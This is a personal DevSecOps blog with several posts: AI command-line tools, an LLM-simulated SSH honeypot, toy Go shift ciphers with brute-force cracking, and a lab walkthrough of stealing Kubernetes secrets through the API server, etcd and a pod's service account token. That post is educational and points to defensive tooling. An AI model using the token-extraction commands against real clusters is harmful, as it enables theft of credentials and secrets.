2024-03-18

AI for DevSecOps

image

I’ve finally decided to try out a couple of AI related tools to see whether they are useful for me. I didn’t want to spend too much time on this (because who has time) so suppose I didn’t get too deep. I work in the Dev/Sec/Ops area, meaning I do small-scale programming (as opposed to full time application development), cybersecurity and IT operations. Since I use terminal a lot I had a look at three non-GUI tools. Here’s what I’ve done and what are my conclusions so far.

Ghatgpt-cli

First, I simply wanted a CLI interface to ChatGPT. One of the first Google results was this project. You just need to give it your API key either via environment variable (export OPENAI_API_KEY=...) or configuration file (enter api_key: ... to ~/.chatgpt-cli/config.yaml) and you’re ready to go. Now I don’t have to open a browser window and log in into ChatGPT:

$ chatgpt write a simple REST API server in python
$ chatgpt what is the best security scanner for container images
$ chatgpt how do I create a kubernetes cluster on aws

I don’t display the answers here to save paper but they are quite usable! Especially when you’re familiar with the topic and can fix the errors or modify the answer to suite you needs.

Fabric

I’ve been aware of Daniel Miessler’s project for a while. It’s basically a collection of ChatGPT prompts (called patterns in the project) and a command line tool to run these prompts. The cool thing is the prompts seem to be expertly written and they are continually updated. Here are some of them.

Create a command with options (flags) based on its help and my requirements:

$ tool=curl;echo -e "use $tool to silently download body to a file.\n\n$($tool -h 2>&1)" | fabric --pattern create_command
curl -s -o output.txt <url>

$ tool=wget;echo -e "use $tool to silently download body to a file.\n\n$($tool -h 2>&1)" | fabric --pattern create_command                                   
wget -q -O file URL

Summarize what a program does and explain its parts:

$ cat ~/github.com/jreisinger/tools/cmd/extracturl/main.go | fabric --pattern explain_code
EXPLANATION:
This Go program is designed to extract and print all the URLs found in the `<a>` (anchor) tags of a given webpage. The program consists of two main parts: the `main` function and the `extractURLs` function.

1. **Initialization and Argument Checking**: 
   - The program starts by setting up logging with a prefix that includes the program's name (obtained from `os.Args[0]`) and disabling additional flags for log output.
   - It then checks if a URL has been provided as a command-line argument. If not, it logs a fatal error message instructing the user to supply a URL.

2. **URL Extraction**:
   - The provided URL is passed to the `extractURLs` function.
   - This function attempts to make an HTTP GET request to the URL. If this request fails, it returns an error.
   - If the request is successful, it reads the response body using an HTML tokenizer from the `golang.org/x/net/html` package.
   - The tokenizer iterates through the HTML tokens in the response body. When it finds start tags (`<a>`) for anchor elements, it looks for the `href` attribute within these tags. The value of each `href` attribute (which is a URL) is collected into a slice (list) of strings.
   - Once all URLs have been collected or an error token is encountered (indicating the end of the document), the function returns the slice of URLs.

3. **Printing Extracted URLs**:
   - Back in the `main` function, if `extractURLs` returns successfully, it iterates over the slice of URLs and prints each one to standard output.

This program is useful for scraping web pages to find all links present on them. It can be used for various purposes, such as web crawling, data mining, or SEO analysis.

Help me to decide whether I should read a given text (rating and quality-score seem most useful):

$ wget -qO- https://jreisinger.blogspot.com/2022/09/preventing-git-leaks.html | fabric --pattern label_and_rate
{
"one-sentence-summary": "A detailed guide on preventing sensitive information leaks when using git, with practical steps and tools.",
"labels": "Tutorial, CyberSecurity, Technology, Education",
"rating:": "A Tier: (Should Consume Original Content This Month)",
"rating-explanation:": "The content provides a comprehensive tutorial on securing git repositories against leaks, aligns well with themes of cybersecurity and technology education, offers actionable steps and tools for implementation, emphasizes the importance of security in software development, and contributes to the broader discussion on protecting sensitive information in the digital age.",
"quality-score": 85,
"quality-score-explanation": "The content is highly informative and relevant to cybersecurity practices, offers practical solutions and tools, is well-structured and easy to follow, contributes valuable knowledge to the field of technology education, and addresses a critical aspect of digital security."
}

Summarize an article:

$ wget -qO- https://www.intercom.com/blog/run-less-software | fabric --pattern create_micro_summary
ONE SENTENCE SUMMARY:
Intercom's "Run Less Software" philosophy emphasizes choosing standard technology, outsourcing undifferentiated heavy lifting, and creating enduring competitive advantage.

MAIN POINTS:
- Standardize technology choices to become experts and build better, faster solutions.
- Outsource non-core activities to focus on creating value for customers.
- Spend time on activities that directly contribute to a competitive advantage.

TAKEAWAYS:
- Simplify technology stack for efficiency and expertise.
- Focus on core business and customer value.
- Ensure activities align with long-term competitive advantage.

The project is well maintained, there are many more interesting patterns and new ones will be probably added.

PS: I ran this blog post through AI to improve the writing (cat 2024-03-18-ai-for-devsecops.md | fabric --pattern improve_writing) but it removed some of my (attempted) jokes from the text … So you are reading a pure human version :-).

Beelzebub

I wrote about basic setup of this honeypot in a previous post. This time I wanted to see its AI part in action. The honeypot uses ChatGPT API to simulate a Linux terminal. After cloning the repo I had to make couple of changes to make it work:

  1. I added my ChatGPT API key to configurations/services/ssh-2222.yaml.
  2. I changed the unsupported model:
diff --git a/plugins/openai-gpt.go b/plugins/openai-gpt.go
<...>
-               Model:            "text-davinci-003",
+               Model:            "gpt-3.5-turbo-instruct",
<...>
  1. I changed the prompt slightly (this was optional):
diff --git a/plugins/openai-gpt.go b/plugins/openai-gpt.go
<...>
-       promptVirtualizeLinuxTerminal = "I want you to act as a Linux terminal. I will type commands and you will reply with what the terminal should show. I want you to only reply with the terminal output inside one unique code block, and nothing else. Do no write explanations. Do not type commands unless I instruct you to do so.\n\nA:pwd\n\nQ:/home/user\n\n"
+       promptVirtualizeLinuxTerminal = "You will act as an Ubuntu Linux terminal. The user will type commands, and you are to reply with what the terminal should show. Your responses must be contained within a single code block. Do not provide explanations or type commands unless explicitly instructed by the user. Remember previous commands and consider their effects on subsequent outputs.\n\nA:pwd\n\nQ:/home/user\n\n"
<...>

I built and started the honeypot locally like this:

$ docker-compose build
$ docker-compose up

Then I logged in and tried a couple of commands:

$ ssh root@localhost -p 2222
<...>
root@ubuntu:~$ id
uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare)
root@ubuntu:~$ su -
Password:
root@ubuntu:~$ id
uid=0(root) gid=0(root) groups=0(root)

root@ubuntu:~$ cat /etc/shadow
root:*:17541:0:99999:7:::

root@ubuntu:~$ go version                                                                                                                               
command not found: go
root@ubuntu:~$ apt install go
Reading package lists... Done
root@ubuntu:~$ go version
go version go1.10.4 linux/amd64

It’s not perfect and if you are attentive and familiar with Linux you’ll notice that something is fishy. But it’s quite impressive and I think it manages to keep the average attacker busy at least for a while.

2024-02-20

Shift cipher in Go with blocks

In the previous post we implemented a shift cipher that accepts key of variable length. Now, the cryptographic algorithms can be classified into two groups. Stream ciphers and block ciphers. Stream ciphers process data a bit at a time and are good for continuous or unknown amounts of data like in networking. Block ciphers operate with fixed-length blocks of data and are suitable for handling variable sized data. What group does our current implementation belong to? Well, it works on a byte at a time so it sounds like a stream cipher. On the other hand, it could be regarded as a block cipher where the block size is one byte. In practice though it always enciphers or deciphers the whole message so the block size equals the message size.

And this is a problem. How come? Well, if the message is not large, it’s fine. But if it’s bigger, say 10GB, we might run out of memory because we read all of it at once

message, err := io.ReadAll(os.Stdin)

and we pass all the bytes we read to Encipher or Decipher function. But these functions only need to work on one byte at a time!

In order to turn our existing code into a practical block cipher, we don’t need to change the cipher scheme, as such. We just need to make it work with chunks, or blocks, of data. For this, there’s a special interface in the standard library’s package crypto/cipher:

type Block interface {
    BlockSize() int
    Encrypt(dst, src []byte)
    Decrypt(dst, src []byte)
}

Standard library interfaces (other famous ones are io.Reader and io.Writer) define standardized “connectors” that allow plugging together different parts of code. So let’s implement it, i.e. let’s create a type with the methods defined in the interface:

// Cipher implements crypto/cipher.Block interface.
type Cipher struct {
    key [BlockSize]byte
}

func NewCipher(key []byte) (cipher.Block, error) {
    if len(key) != BlockSize {
        return nil, fmt.Errorf("%w %d (must be %d)", ErrKeySize, len(key), BlockSize)
    }
    return &Cipher{
        key: [BlockSize]byte(key),
    }, nil
}

func (c *Cipher) Encrypt(dst, src []byte) {
    for i, b := range src {
        dst[i] = b + c.key[i]
    }
}

func (c *Cipher) Decrypt(dst, src []byte) {
    for i, b := range src {
        dst[i] = b - c.key[i]
    }
}

func (c *Cipher) BlockSize() int {
    return BlockSize
}

Fine but if you look at the signatures of the Encrypt and Decrypt functions they still take all the data as input. Maybe we have a little look at the documentation:

$ go doc crypto/cipher Block
<...>
    It provides the capability to encrypt or decrypt individual blocks. The mode
    implementations extend that capability to streams of blocks.

Aha, we need some other code, called mode, that will chop data for the Encrypt and Decrypt functions into chunks:

type BlockMode interface {                                                                                                                                  
    BlockSize() int                                                                                                                                     
    CryptBlocks(dst, src []byte)                                                                                                                        
}                                                                                                                                                           

Let’s implement also this interface (I show here only the code for encrypting):

type Encrypter struct {
    cipher    cipher.Block
    blockSize int
}

func NewEncrypter(c cipher.Block) Encrypter {
    return Encrypter{
        cipher:    c,
        blockSize: c.BlockSize(),
    }
}

func (e Encrypter) CryptBlocks(dst, src []byte) {
    if len(src)%e.blockSize != 0 {
        panic("encrypter: input not full blocks")
    }
    if len(dst) < len(src) {
        panic("encrypter: output smaller than input")
    }
    // Keep chopping block-sized pieces off the plaintext
    // and enciphering them until there are no more pieces.
    for len(src) > 0 {
        e.cipher.Encrypt(dst[:e.blockSize], src[:e.blockSize])
        dst = dst[e.blockSize:]
        src = src[e.blockSize:]
    }

}

func (e Encrypter) BlockSize() int {
    return e.blockSize
}

This is awesome and there’s one major problem. The CryptBlocks function will panic if the plaintext is not aligned with the blockSize (32 bytes in our case). It means we can work only with messages whose length in bytes is a multiple of 32. Interesting but a bit limiting. We improve on this situation by padding all messages to be multiples of 32. We define the padding scheme like this. Both the number and the value of padded bytes is equal to the difference from the nearest multiple of block size. If the message size is aligned with the block size, the number and the value of padded bytes is equal to the block size. And here’s the code:

func Pad(data []byte, blockSize int) []byte {
    n := blockSize - len(data)%blockSize
    padding := bytes.Repeat([]byte{byte(n)}, n)
    return append(data, padding...)
}

func Unpad(data []byte, blockSize int) []byte {
    n := int(data[len(data)-1])
    return data[:len(data)-n]
}

Finally we have all the necessary code to create commands that can encrypt and decrypt arbitrary data:

$ export KEY=0101010101010101010101010101010101010101010101010101010101010101
$ go run ./cmd/encipher/ -key $KEY < ../shift/testdata/tiger.txt | go run ./cmd/decipher/ -key $KEY 
The tiger appears at its own pleasure. When we become very silent at that
place, with no expectation of the tiger, that is when he chooses to appear...
When we stand at the edge of the river waiting for the tiger, it seems that the
silence takes on a quality of its own. The mind comes to a stop. In the Indian
tradition that is the moment when the teacher says, “You are that. You are that
silence. You are that.”
--Francis Lucille, “The Perfume of Silence”

See https://github.com/jreisinger/pocs/tree/main/crypto/shift-block for the full code.

2024-02-16

Shift cipher in Go with multibyte key

In the previous blog post we developed a simple crypto system. Its algorithm is based on shifting bytes by the number represented by a single byte we call a key. It means Eve has to do at maximum 256 (1 byte is 8 bits and that means 2^8 possibilities) guesses to find out the key. Let’s try to improve the situation here by supporting longer keys.

To encipher a message we go through it byte by byte and we also go byte by byte through the key. Usually the key is much shorter than the message we want to encrypt. So we need to go through the key multiple times. The math trick to do this is called modulo. A mod B is the remainder that’s left after dividing A by B as many times as you can. E.g. 5 mod 2 = 1. Modular arithmetic is sometimes called “clock arithmentic” because it wraps around like an analog clock; 12 hours later than 5 o’clock can’t be 17 o’clock, it’s 5 o’clock again. To put it another way, 17 mod 12 = 5.

To illustrate how modulo (% in Go) works let’s write a short program:

func main() {
        B := 3
        for A := range 10 {
                fmt.Printf("%d mod %d = ", A, B)
                fmt.Println(A % B)
        }
}

The program will produce this output - notice the result is never greater than 2 which is handy for a slice (or array) index:

0 mod 3 = 0
1 mod 3 = 1
2 mod 3 = 2
3 mod 3 = 0
4 mod 3 = 1
5 mod 3 = 2
6 mod 3 = 0
7 mod 3 = 1
8 mod 3 = 2
9 mod 3 = 0

OK, let’s use modulo to help us encrypt a message:

func Encipher(plaintext []byte, key []byte) []byte {
    ciphertext := make([]byte, len(plaintext))
    for i, b := range plaintext {
        ciphertext[i] = b + key[i%len(key)]
    }
    return ciphertext
}

To decrypt a message encrypted by a multi-byte key we do the same in reverse:

func Decipher(ciphertext []byte, key []byte) []byte {
    plaintext := make([]byte, len(ciphertext))
    for i, b := range ciphertext {
        plaintext[i] = b - key[i%len(key)]
    }
    return plaintext
}

Now, how do we pass a multi-byte key as a command line argument? The key, in some sense, is just a single number, no matter how many bytes it takes to express it. For example, if we had a 32-byte (that is, 256-bit) key, we could express it as either a series of 32 integers (one for each byte), or as a single very large integer. But Go’s int64 can hold only 8 bytes (or 64 bits) worth of information… There’s a neat and concise way to write large integers: as a string, using hexadecimal notation. For example the decimal number 3 735 928 559 can be represented as DEADBEEF (4 bytes) in hex, isn’t that funny? :-) If fact, any given byte can be written as exactly two hex digits, which is convenient.

$ echo hello | go run ./cmd/encipher -key DEADBEEF
F*[M�

Also notice that unlike with the single-byte version, the same plaintext letter does not always produce the same ciphertext letter. The “ll” is enciphered as “[M”. This makes the frequency analysis a lot harder for Eve.

But what troubles Eve even more is that her function for brute-forcing single key shift ciphers won’t work anymore:

func Crack(ciphertext, crib []byte) (key byte, err error) {
    for guess := 0; guess < 256; guess++ {
        plaintext := Decipher(ciphertext[:len(crib)], byte(guess))
        if bytes.Equal(plaintext, crib) {
            return byte(guess), nil
        }
    }
    return 0, errors.New("no key found")
}

She has to solve couple of issues:

  • Repeat the guessing of the key byte multiple times. The number of repetitions will be either the length of the encrypted message or some value defined by us (MaxKeyLen); whatever is smaller.
  • In order to use the Decipher function she needs to create byte slice out of a byte to match the function’s arguments type.
  • She has to check the whole key is correct after each cracked key byte.
const MaxKeyLen = 32 // bytes

func Crack(ciphertext, crib []byte) (key []byte, err error) {
    for k := range min(MaxKeyLen, len(ciphertext)) {
        for guess := range 256 {
            plaintext := Decipher([]byte{ciphertext[k]}, []byte{byte(guess)})
            if plaintext[0] == crib[k] {
                key = append(key, byte(guess))
                break
            }
        }
        if bytes.Equal(Decipher(ciphertext[:len(crib)], key), crib) {
            return key, nil
        }
    }
    return nil, errors.New("no key found")
}

The longer key is harder to brute-force but it’s still possible:

$ go run ./cmd/encipher -key DEADBEEF < ../shift/testdata/tiger.txt | go run ./cmd/crack -crib 'The tiger'
The tiger appears at its own pleasure. When we become very silent at that
place, with no expectation of the tiger, that is when he chooses to appear...
When we stand at the edge of the river waiting for the tiger, it seems that the
silence takes on a quality of its own. The mind comes to a stop. In the Indian
tradition that is the moment when the teacher says, “You are that. You are that
silence. You are that.”
--Francis Lucille, “The Perfume of Silence”

However, there is a limitation (or a bug): the crib must be at least as long as the key; it this case 4 bytes, i.e. ‘The’.

See https://github.com/jreisinger/pocs/tree/main/crypto/shift-multibytekey for all the code including tests.

2024-02-15

Shift cipher in Go

A simple way to encipher (or encrypt) some data is by using the shift cipher. We can do this in Go by going through the data byte by byte adding a key to each of the bytes. In Go bytes are equivalent to 8-bit numbers ranging from 0 to 255 (byte data type is actually an alias for uint8).

func Encipher(plaintext []byte, key byte) []byte {
    ciphertext := make([]byte, len(plaintext))
    for i, b := range plaintext {
        ciphertext[i] = b + key
    }
    return ciphertext
}

To decipher we need to do the same but in reverse, i.e. we detract the key from each byte of the enciphered data.

func Decipher(ciphertext []byte, key byte) []byte {
    return Encipher(ciphertext, -key)
}

This way Alice and Bob can exchange data in somehow secure manner. If Eve wants to learn what are they talking about she needs to know the encryption algorithm and the key. Let’s say she finds out they are using the Caesar cipher so she just needs to crack the key. The standard way to do this is called brute forcing, i.e. trying out all possibilities; in our case all possible keys. She also needs to know some bytes from the beginning of the “plaintext” data; this we call a crib.

func Crack(ciphertext, crib []byte) (key byte, err error) {
    for guess := 0; guess < 256; guess++ {
        result := Decipher(ciphertext[:len(crib)], byte(guess))
        if bytes.Equal(result, crib) {
            return byte(guess), nil
        }
    }
    return 0, errors.New("no key found")
}

If we call these functions from within commands (package main) it looks like this:

$ echo HAL | go run ./cmd/encipher
IBM
$ echo IBM | go run ./cmd/decipher
HAL
$ echo hello world | go run ./cmd/encipher -key 10 | go run ./cmd/crack -crib hell                                                                          
hello world

See shift for all the code. Most of the ideas and code come from John Arundel’s book I started to read. I plan to write the code from the book and to take notes in the form of blog posts like this one.

2024-01-27

Stealing Kubernetes secrets

Kubernetes provides an object called Secret that is meant for storing sensitive data like passwords, tokens or keys. Secrets are decoupled (distinct) from Pods to decrease the risk of exposing sensitive data while creating, viewing and updating Pods. Containers in a Pod can access secrets via environment variables or files mounted through volumes.

Let’s create a Secret named mypassword holding a key/value pair password=s3cret!:

$ kubectl create secret generic mypassword --from-literal password=s3cret!

NOTE: When you create secrets from command line they get persisted in your shell history file, e.g. ~/.bash_history. To prevent this add space in front of the command. The secret is also visible in the processes listing, like ps aux. So it’s best not to create production secrets from command line.

Ok, now, how secure is the secret we’ve created? It turns out that by default, not very. Let’s have a look.

Getting secrets from the API server

Anyone who has access to the Kubernetes API server can get the secret:

$ kubectl get secrets mypassword -o yaml
...
data:
  password: czNjcmV0IQ==
...

Oh, but we can’t read it. Is it encrypted? No, it’s just base64 decoded:

$ echo czNjcmV0IQ== | base64 -d -
s3cret!

Getting secrets from etcd

Secrets, like other Kubernetes objects, are persisted in the etcd data store; by default unencrypted. So if we can access the data store, we can see the secrets. On a minikube cluster, we can do it like this:

$ minikube ssh
$ sudo -i
$ cat << "EOF" | bash
export ETCDCTL_CACERT=/var/lib/minikube/certs/etcd/ca.crt
export ETCDCTL_CERT=/var/lib/minikube/certs/etcd/peer.crt
export ETCDCTL_KEY=/var/lib/minikube/certs/etcd/peer.key
export ETCDCTL_API=3

ETCDCTL_BIN=$(find / -name etcdctl | grep bin | head -1)

$ETCDCTL_BIN get /registry/secrets/default/mypassword
EOF
...
passwords3cret!▒Opaque▒"
...

Getting secrets from within a Pod

Let’s suppose that we can’t access the API server or the etcd database because the cluster operator put some authorization in place. And that’s the way to do it on a production cluster. The authorization mechanism in Kubernetes is called RBAC (Role Based Access Control). It’s composed of the following primitives

  • User represents a “normal user” connecting to the cluster (there’s no API resource for User)
  • ServiceAccount represents a program running in a pod and there is a pre-created default service account for each namespace assigned to each created pod
  • Role defines a set of permissions on a namespace (or cluster) level
  • RoleBinding maps roles to users or service accounts on a namespace (or cluster) level

Let’s create a service account that is allowed to read (list allows for implicit reading) all secrets within the default namespace:

$ kubectl create serviceaccount secrets-reader
$ kubectl create role read-secrets --resource secrets --verb list
$ kubectl create rolebinding secrets-reader --serviceaccount default:secrets-reader --role read-secrets

Here’s a pod using the service account we have created (instead of the default service account):

$ cat << EOF | k apply -f -
apiVersion: v1
kind: Pod
metadata:
  labels:
    run: nginx
  name: nginx
spec:
  serviceAccount: secrets-reader
  containers:
  - image: nginx
    name: nginx
EOF

Service account authenticates to the Kubernetes API via a JWT token that is mounted inside pod containers. If an attacker gains access to a container (for example by exploiting a vulnerability inside a web application or a web server) she can get all secrets in a namespace (or on the whole cluster if clusterrolebinding was used). Like this:

$ cat << 'EOF' | kubectl exec -i nginx -- bash | jq -r '.items[].data.password' | base64 -d
SAPATH=/var/run/secrets/kubernetes.io/serviceaccount
TOKEN=$(cat ${SAPATH}/token)
CACERT=${SAPATH}/ca.crt
URLPATH=https://kubernetes.default.svc/api/v1/namespaces/default/secrets
curl -s --cacert ${CACERT} --header "Authorization: Bearer ${TOKEN}" $URLPATH
EOF

Finding risky Roles

There’s a tool called KubiScan that can find risky roles (and other objects) for you:

$ git clone git@github.com:cyberark/KubiScan.git
$ cd KubiScan
$ ./docker_run.sh ~/.kube/config

$ kubiscan --risky-roles # -r to show also rules (permissions)
...
+------------+
|Risky Roles |
+----------+------+-------------+------------------------------------+-----------------------------------+
| Priority | Kind | Namespace   | Name                               | Creation Time                     |
+----------+------+-------------+------------------------------------+-----------------------------------+
| CRITICAL | Role | default     | read-secrets                       | Sat Jan 27 16:30:21 2024 (0 days) |
| CRITICAL | Role | kube-system | system:controller:bootstrap-signer | Sat Jan 27 16:21:17 2024 (0 days) |
| CRITICAL | Role | kube-system | system:controller:token-cleaner    | Sat Jan 27 16:21:17 2024 (0 days) |
+----------+------+-------------+------------------------------------+-----------------------------------+

2024-01-19

Playing with beelzebub

image

While looking for a new project to hone my skills I came across the beelzebub. Wikipedia says Beelzebub, occasionally known as the Lord of the Flies, was a Philistine god and later a major demon for some Abrahamic religions. In this case it’s a honeypot written in Go :-).

My plan was something like:

  1. Create a Kubernetes cluster on AWS using the EKS service
  2. Deploy the honeypot into the cluster
  3. Setup logs collection to see what’s going on
  4. Expose the honeypot to a dangerous network, like the Internet, and wait

Create a Kubernetes cluster

Once I have set up my access to AWS and installed all the necessary tools, the easiest way to create a Kubernetes cluster seemed to be this:

eksctl create cluster --name beelzebub-cluster --region eu-central-1

It took about 15 minutes but went smoothly.

Deploy the honeypot into the cluster

Next, I just cloned the beelzebub repo and created the Kubernetes resources from within the repo:

helm install beelzebub ./beelzebub-chart

Setup logs collection

Now, a Kubernetes cluster provides logs from several components:

  • control plane
  • nodes
  • applications

I was most interested in the application (or container) logs. For this I used the CloudWatch observability addon for EKS. To make it work I needed to attach some new policies to the worker nodes role and then create the addon.

aws iam attach-role-policy \
    --role-name <my-worker-node-role> \
    --policy-arn arn:aws:iam::aws:policy/CloudWatchAgentServerPolicy  \ 
    --policy-arn arn:aws:iam::aws:policy/AWSXrayWriteOnlyAccess
aws eks create-addon --addon-name amazon-cloudwatch-observability --cluster-name beelzebub-cluster

Expose the honeypot to the Internet

Then, I created a Kubernetes service of type LoadBalancer:

kubernetes expose deployment beelzebub-beelzebub-chart --name beelzebub-public --type LoadBalancer --port 22 --target-port 2222

I had to wait for a bit so the load balancer is set up. I opened the CloudWatch Logs Insights, selected the /aws/containerinsights/beelzebub-cluster/application log group and entered the following query:

filter kubernetes.pod_name="beelzebub-beelzebub-chart-b86c7dff8-59ldz"
| fields @timestamp, log_processed.event.Msg, log_processed.event.User, log_processed.event.Password, log_processed.event.Command, log_processed.event.CommandOutput
| sort @timestamp desc
| limit 20

To make sure everything is working, I logged into the honeypot and observed the logs (it takes a while until the logs get to the CloudWatch):

ssh root@<some-string>.elb.eu-central-1.amazonaws.com ls -la
# obviously, the default password is root :-)
image

Clean up

Once I was done, I removed the cluster (and all of its workloads and related AWS services):

eksctl delete cluster --name beelzebub-cluster --region eu-central-1

You might also want to delete the related CloudWatch Log groups.